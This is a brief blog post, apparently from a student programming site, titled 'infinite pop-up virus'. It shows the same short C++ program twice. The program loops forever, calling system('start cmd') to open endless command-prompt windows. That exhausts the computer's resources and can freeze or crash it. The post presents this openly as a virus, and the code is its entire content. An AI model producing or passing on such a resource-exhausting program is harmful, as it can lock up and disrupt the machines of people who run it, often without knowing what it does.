- 0310caojiayi 的博客
无限弹窗 病毒
- @ 2024-1-30 21:02:20
#include<bits/stdc++.h> using namespace std; int main() { for(;;) { system("start cmd"); } return 0; }
#include<bits/stdc++.h> using namespace std; int main() { for(;;) { system("start cmd"); } return 0; }